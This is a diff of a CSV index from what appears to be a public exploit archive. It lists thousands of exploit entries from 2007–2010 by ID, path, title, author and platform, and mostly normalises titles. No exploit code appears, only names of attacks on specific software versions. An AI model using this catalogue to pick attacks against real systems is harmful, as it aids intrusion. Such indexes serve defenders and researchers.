3993,platforms/windows/remote/3993.html,"IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit",2007-05-26,rgod,windows,remote,0
3993,platforms/windows/remote/3993.html,"Internet Explorer 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit",2007-05-26,rgod,windows,remote,0
3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0
3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability",2007-05-26,"Mehmet Ince",php,webapps,0
3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)",2007-05-26,fabio/b0x,windows,remote,80
@ -3673,7 +3673,7 @@ id,file,description,date,author,platform,type,port
4020,platforms/php/webapps/4020.php,"RevokeBB <= 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0
4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX (sasatl.dll) Remote BoF Exploit",2007-06-01,shinnai,windows,remote,0
4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion Exploit",2007-06-01,GoLd_M,php,webapps,0
4023,platforms/windows/remote/4023.html,"IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0
4023,platforms/windows/remote/4023.html,"Internet Explorer 6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0
4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0
4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0
4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0
@ -3981,7 +3981,7 @@ id,file,description,date,author,platform,type,port
4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0
4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0
4336,platforms/php/webapps/4336.txt,"xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability",2007-08-29,DarkFuneral,php,webapps,0
4337,platforms/windows/dos/4337.c,"MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
4337,platforms/windows/dos/4337.c,"MS Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit",2007-08-29,k1tk4t,php,webapps,0
4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 (shownews.php id) Remote SQL Injection Vulnerability",2007-08-29,SmOk3,php,webapps,0
4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities",2007-08-29,GoLd_M,php,webapps,0
@ -4227,7 +4227,7 @@ id,file,description,date,author,platform,type,port
4581,platforms/php/webapps/4581.txt,"Sige 0.1 sige_init.php Remote File Inclusion Vulnerability",2007-10-28,GoLd_M,php,webapps,0
4582,platforms/php/webapps/4582.txt,"teatro 1.6 (basePath) Remote File Include Vulnerability",2007-10-28,"Alkomandoz Hacker",php,webapps,0
4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x (m3u File) Local Stack Overflow Exploit",2007-10-29,TaMBaRuS,windows,local,0
4584,platforms/windows/local/4584.c,"Kodak Image Viewer TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
4584,platforms/windows/local/4584.c,"Kodak Image Viewer -TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 RFI Vulnerability",2007-10-29,r00t@zapak.com,php,webapps,0
4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Remote File Upload Vulnerability Shell Upload Exploit",2007-10-29,r00t@zapak.com,php,webapps,0
4587,platforms/php/webapps/4587.txt,"miniBB 2.1 (table) Remote SQL Injection Vulnerability",2007-10-30,irk4z,php,webapps,0
@ -4258,7 +4258,7 @@ id,file,description,date,author,platform,type,port
4613,platforms/windows/dos/4613.html,"Adobe Shockwave ShockwaveVersion() Stack Overflow PoC",2007-11-08,Elazar,windows,dos,0
4614,platforms/php/webapps/4614.txt,"jPORTAL <= 2.3.1 articles.php Remote SQL Injection Vulnerability",2007-11-09,Alexsize,php,webapps,0
4615,platforms/multiple/dos/4615.txt,"MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability",2007-11-09,"Kristian Hermansen",multiple,dos,0
4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0
4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0
4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0
4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script ver 1 Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0
4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection Vulnerability",2007-11-11,IRCRASH,php,webapps,0
@ -4387,7 +4387,7 @@ id,file,description,date,author,platform,type,port
4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC",2007-12-18,r4x,windows,dos,0
4743,platforms/php/webapps/4743.pl,"FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0
4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device (Goahead WEBSERVER) Disclosure Vulnerability",2007-12-18,NeoCoderz,hardware,remote,0
4745,platforms/windows/remote/4745.cpp,"MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0
4745,platforms/windows/remote/4745.cpp,"MS Windows Message Queuing Service - RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0
4746,platforms/windows/remote/4746.html,"RavWare Software MAS Flic Control Remote Buffer Overflow Exploit",2007-12-18,shinnai,windows,remote,0
4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0
4748,platforms/windows/dos/4748.php,"SurgeMail v.38k4 webmail Host header Denial of Service Exploit",2007-12-18,rgod,windows,dos,0
@ -4401,7 +4401,7 @@ id,file,description,date,author,platform,type,port
4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0
4758,platforms/php/webapps/4758.txt,"xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability",2007-12-19,p4imi0,php,webapps,0
4759,platforms/osx/local/4759.c,"Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit",2007-12-19,"Subreption LLC.",osx,local,0
4760,platforms/windows/remote/4760.txt,"MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
4760,platforms/windows/remote/4760.txt,"MS Windows 2000 AS SP4 - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25
4762,platforms/php/webapps/4762.txt,"nicLOR CMS (sezione_news.php) Remote SQL Injection Vulnerability",2007-12-21,x0kster,php,webapps,0
4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 (output) Remote File Inclusion Vulnerability",2007-12-21,CraCkEr,php,webapps,0
@ -4742,7 +4742,7 @@ id,file,description,date,author,platform,type,port
5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess <= 0.8 - Remote SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit",2008-02-12,DNX,php,webapps,0
5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client WFICA.OCX ActiveX - Heap BOF Exploit",2008-02-12,Elazar,windows,remote,0
5107,platforms/windows/local/5107.c,"Microsoft Office .WPS File Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0
5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - .WPS File Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0
5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion Vulnerability",2008-02-13,GoLd_M,php,webapps,0
5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0
5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0
@ -4918,7 +4918,7 @@ id,file,description,date,author,platform,type,port
5283,platforms/linux/remote/5283.txt,"CenterIM <= 4.22.3 - Remote Command Execution Vulnerability",2008-03-20,"Brian Fonfara",linux,remote,0
5285,platforms/php/webapps/5285.txt,"RunCMS Module section (artid) Remote SQL Injection Vulnerability",2008-03-20,Cr@zy_King,php,webapps,0
5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base Remote SQL Injection Vulnerability",2008-03-20,xcorpitx,php,webapps,0
5287,platforms/windows/local/5287.txt,"Microsoft Office Excel Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0
5287,platforms/windows/local/5287.txt,"Microsoft Office Excel - Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0
5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 Multiple Local File Inclusion Vulnerabilities",2008-03-21,0x90,php,webapps,0
5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root Vulnerability",2008-03-21,"Pranav Joshi",hardware,remote,0
5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability",2008-03-21,S@BUN,php,webapps,0
@ -4951,7 +4951,7 @@ id,file,description,date,author,platform,type,port
5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0
5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability",2008-03-28,parad0x,php,webapps,0
5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0
5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016)",2008-03-30,Marsu,windows,local,0
5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow Exploit (MS08-016)",2008-03-30,Marsu,windows,local,0
5321,platforms/windows/dos/5321.txt,"Visual Basic (vbe6.dll) Local Stack Overflow PoC / DoS",2008-03-30,Marsu,windows,dos,0
5322,platforms/php/webapps/5322.txt,"Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability",2008-03-30,S@BUN,php,webapps,0
5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta Remote File Inclusion Exploit",2008-03-30,bd0rk,php,webapps,0
@ -5072,7 +5072,7 @@ id,file,description,date,author,platform,type,port
5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling Vulnerability",2008-04-13,t0pP8uZz,php,webapps,0
5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0
5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS Remote SQL Injection Vulnerability",2008-04-14,cO2,php,webapps,0
5442,platforms/windows/local/5442.cpp,"MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0
5442,platforms/windows/local/5442.cpp,"MS Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0
5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) Remote SQL Injection Vulnerability",2008-04-14,Stack,php,webapps,0
5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability",2008-04-14,"SoSo H H",php,webapps,0
5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow Exploit",2008-04-14,Heretic2,windows,remote,2954
@ -5148,7 +5148,7 @@ id,file,description,date,author,platform,type,port
5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0
5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0
5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0
5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 - (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0
5520,platforms/php/webapps/5520.txt,"Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability",2008-04-28,HaCkeR_EgY,php,webapps,0
5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability",2008-04-29,"Roberto Suggi Liverani",php,webapps,0
@ -6027,7 +6027,7 @@ id,file,description,date,author,platform,type,port
6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0
6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 (lfi/sql) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0
6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability",2008-09-13,Crackers_Child,asp,webapps,0
6454,platforms/windows/remote/6454.html,"Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0
6454,platforms/windows/remote/6454.html,"Windows Media Encoder XP SP2 - wmex.dll ActiveX BOF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0
6455,platforms/php/webapps/6455.txt,"Linkarity (link.php) Remote SQL Injection Vulnerability",2008-09-13,"Egypt Coder",php,webapps,0
6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 Arbitrary Database Backup Vulnerability",2008-09-13,SirGod,php,webapps,0
6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability",2008-09-14,Stack,php,webapps,0
@ -6224,7 +6224,7 @@ id,file,description,date,author,platform,type,port
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability",2008-10-02,ZeN,php,webapps,0
6654,platforms/windows/dos/6654.pl,"mIRC 6.34 Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0
6655,platforms/php/webapps/6655.php,"OpenX 2.6 (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0
6656,platforms/windows/remote/6656.txt,"MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021",2008-10-02,Ac!dDrop,windows,remote,0
6656,platforms/windows/remote/6656.txt,"MS Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0
6657,platforms/php/webapps/6657.pl,"IP Reg <= 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0
6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x (malformed archive) DoS Exploit",2008-10-03,LiquidWorm,windows,dos,0
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script (arsaprint.php id) SQL Injection Vulnerability",2008-10-03,"Hussin X",php,webapps,0
@ -6297,7 +6297,7 @@ id,file,description,date,author,platform,type,port
6729,platforms/php/webapps/6729.php,"SlimCMS <= 1.0.0 (redirect.php) Privilege Escalation Exploit",2008-10-10,StAkeR,php,webapps,0
6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0
6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln",2008-10-11,Hakxer,asp,webapps,0
6732,platforms/windows/dos/6732.txt,"MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
6732,platforms/windows/dos/6732.txt,"MS Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 (lfd/ce) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0
6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure Vulnerabilities",2008-10-12,GoLd_M,php,webapps,0
6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
@ -6387,7 +6387,7 @@ id,file,description,date,author,platform,type,port
6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0
6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0
6823,platforms/php/webapps/6823.txt,"siteengine 5.x Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0
6824,platforms/windows/dos/6824.txt,"MS Windows Server Service Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
6824,platforms/windows/dos/6824.txt,"MS Windows Server Service - Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
6825,platforms/windows/local/6825.pl,"VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)",2008-10-23,"Guido Landi",windows,local,0
6826,platforms/php/webapps/6826.txt,"joomla component archaic binary gallery 0.2 - Directory Traversal vuln",2008-10-24,H!tm@N,php,webapps,0
6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - Remote SQL Injection Vulnerability",2008-10-24,H!tm@N,php,webapps,0
@ -6404,7 +6404,7 @@ id,file,description,date,author,platform,type,port
6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (meta)",2008-10-25,"Saint Patrick",windows,dos,0
6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln",2008-10-26,"Hussin X",php,webapps,0
6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0
6841,platforms/windows/remote/6841.txt,"MS Windows Server Service Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135
6841,platforms/windows/remote/6841.txt,"MS Windows Server Service - Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135
6842,platforms/php/webapps/6842.txt,"WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln",2008-10-26,boom3rang,php,webapps,0
6843,platforms/php/webapps/6843.txt,"SFS Ez Forum (forum.php id) SQL Injection Vulnerability",2008-10-26,Hurley,php,webapps,0
6844,platforms/php/webapps/6844.pl,"MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0
@ -6742,7 +6742,7 @@ id,file,description,date,author,platform,type,port
7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0
7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit",2008-11-22,cOndemned,php,webapps,0
7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index (id) Remote SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0
7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069",2008-11-23,"Jerome Athias",windows,remote,0
7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0
7197,platforms/php/webapps/7197.txt,"Goople Cms 1.7 - Remote File Upload Vulnerability",2008-11-23,x0r,php,webapps,0
7198,platforms/php/webapps/7198.txt,"NetArtMedia Cars Portal 2.0 (image.php id) SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0
7199,platforms/php/webapps/7199.txt,"NetArtMedia Blog System (image.php id) SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0
@ -7602,10 +7602,10 @@ id,file,description,date,author,platform,type,port
8074,platforms/multiple/local/8074.rb,"Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)",2009-02-18,sh2kerr,multiple,local,0
8075,platforms/php/webapps/8075.pl,"Firepack (admin/ref.php) Remote Code Execution Exploit",2009-02-18,Lidloses_Auge,php,webapps,0
8076,platforms/php/webapps/8076.txt,"smNews 1.0 Auth Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0
8077,platforms/windows/dos/8077.html,"MS Internet Explorer 7 Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
8079,platforms/windows/remote/8079.html,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (xp sp2)",2009-02-20,Abysssec,windows,remote,0
8080,platforms/windows/remote/8080.py,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
8082,platforms/windows/remote/8082.html,"MS Internet Explorer 7 Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0
8077,platforms/windows/dos/8077.html,"MS Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
8079,platforms/windows/remote/8079.html,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0
8080,platforms/windows/remote/8080.py,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
8082,platforms/windows/remote/8082.html,"MS Internet Explorer 7 - Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0
8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0
8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0
@ -7670,7 +7670,7 @@ id,file,description,date,author,platform,type,port
8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0
8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0
8152,platforms/windows/remote/8152.py,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)",2009-03-04,"Ahmed Obied",windows,remote,0
8152,platforms/windows/remote/8152.py,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Fast)",2009-03-04,"Ahmed Obied",windows,remote,0
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80
8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0
8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0
@ -9165,7 +9165,7 @@ id,file,description,date,author,platform,type,port
9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal vulnerability",2009-09-17,DreamTurk,php,webapps,0
9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 (.wav file) Local Crash PoC",2009-09-17,zAx,windows,dos,0
9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b (pageHeader.php path) RFI Vulnerability",2009-09-17,"EA Ngel",php,webapps,0
9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 Local Privilege Escalation Vulnerability",2009-09-17,Rick,linux,local,0
9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Local Privilege Escalation Vulnerability",2009-09-17,Rick,linux,local,0
9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x (itemid) Remote SQL Injection Vulnerability",2009-09-17,"learn3r hacker",php,webapps,0
9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injection Vulnerabilities",2009-09-17,"learn3r hacker",php,webapps,0
9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 (Auth Bypass) SQL Injection Vulnerability",2009-09-17,"learn3r hacker",php,webapps,0
@ -10222,7 +10222,7 @@ id,file,description,date,author,platform,type,port
11148,platforms/php/webapps/11148.txt,"PonVFTP Bypass and Shell Upload Vulnerability",2010-01-15,S2K9,php,webapps,0
11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - (.rt) Local Buffer Overflow PoC",2010-01-15,"fl0 fl0w",windows,dos,0
11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 & 2.0 - Local Crash PoC",2010-01-15,R3d-D3V!L,windows,dos,0
11151,platforms/windows/remote/11151.html,"IE wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
11151,platforms/windows/remote/11151.html,"Internet Explorer wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
11152,platforms/windows/local/11152.py,"Google SketchUp <= 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow Exploit",2010-01-16,Dz_attacker,windows,local,0
11155,platforms/php/webapps/11155.txt,"Transload Script Upload Vulnerability",2010-01-16,DigitALL,php,webapps,0
@ -10288,7 +10288,7 @@ id,file,description,date,author,platform,type,port
11226,platforms/php/webapps/11226.txt,"Joomla Component com_biographies SQL injection Vulnerability",2010-01-22,snakespc,php,webapps,0
11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 (.mp3) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0
11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 (.mp3 /.pls File) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0
11229,platforms/windows/local/11229.txt,"IE wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)",2010-01-22,Stack,windows,local,0
11229,platforms/windows/local/11229.txt,"Internet Explorer wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)",2010-01-22,Stack,windows,local,0
11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit",2010-01-22,mu-b,windows,local,0
11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote DoS/Crash Exploit",2010-01-22,"Zer0 Thunder",windows,dos,0
11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash PoC",2010-01-23,b0telh0,windows,dos,0
@ -11174,7 +11174,7 @@ id,file,description,date,author,platform,type,port
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
